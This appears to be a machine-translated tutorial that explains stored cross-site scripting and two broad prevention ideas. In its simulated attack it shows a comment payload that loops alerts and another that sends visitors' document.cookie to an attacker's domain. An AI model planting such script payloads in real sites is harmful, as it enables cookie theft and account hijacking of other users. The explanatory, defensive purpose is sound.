XSS cross-site scripting vulnerability explanation and Protection

XSS cross-site scripting vulnerability explanation and Protection

What is "xss cross-site scripting "? Baidu encyclopedia says this: Cross-Site Scripting (XSS) is not the abbreviation of Cascading Style Sheet (CSS, therefore, cross-site scripting attacks are abbreviated as XSS. A malicious attacker inserts malicious html code into a Web page. When a user browses this page, the html code embedded in the Web is executed, so as to achieve the Special Purpose of malicious attacks.

Baidu Baike explained it very well, but I still don't understand it. Now I want to talk about it in the vernacular. Do not make a brick if you still don't understand it!

First, let's take a look at the name "cross-site scripting attack", which clearly indicates that the attack execution object is a script. I believe many people have encountered such a problem during the development process: I wrote an article with Script fragments in the content. For example, there is an alert prompt, at the time of reading this article, alert came out. In fact, our intention is to let him display it like normal text, but he did.

Well, I mentioned that many people have been shot. Many people asked online how to solve this problem? Let's not talk about how to solve the problem first. I will tell you a bad news that you are already winning. This is the "Cross-Site Scripting Vulnerability ".

In a broad sense, if your system can receive and save the content as it is, it indicates that your system has this vulnerability, if I submit malicious scripts, your system will still be able to receive them, which gives criminals a chance.

Now I will simulate the attack process.

For example, if you have a website with the domain name www.blog.com, there is a cross-site vulnerability.

I also have a website with the domain name www.gaopohuai.com and a cross-site vulnerability. However, I only accept and do not display the website.

I am here to act as the criminals.

When I access the Internet, I accidentally see your website. Good guys, many articles, and many comments. I also hold a forum and find an article to comment on.

I write a comment like this:
 

<script type="text/javascript">while(true){alert(1);}</script>

I guess what will happen when someone visits this article again?

I want to write another method:

<script type="text/javascript">window.open("http://www.gaopohuai.com?cookie="+document.cookie);</script>

Let's guess what happens when other users access this article? Yes, their cookie information has been sent to me, and it can be all valuable information.

Speaking of this, you should understand how this vulnerability works.

Let's talk about how to prevent it.

In my opinion, there are at least two ways to solve this problem:

1. Don't let you submit it.

2. Do not let you execute it when it is displayed.

The idea is simple. 1. I will not allow you to submit content containing malicious scripts; 2. If you submit it, I will not allow it to execute it when it is displayed. This problem can be solved at any point, and it is better to achieve both points.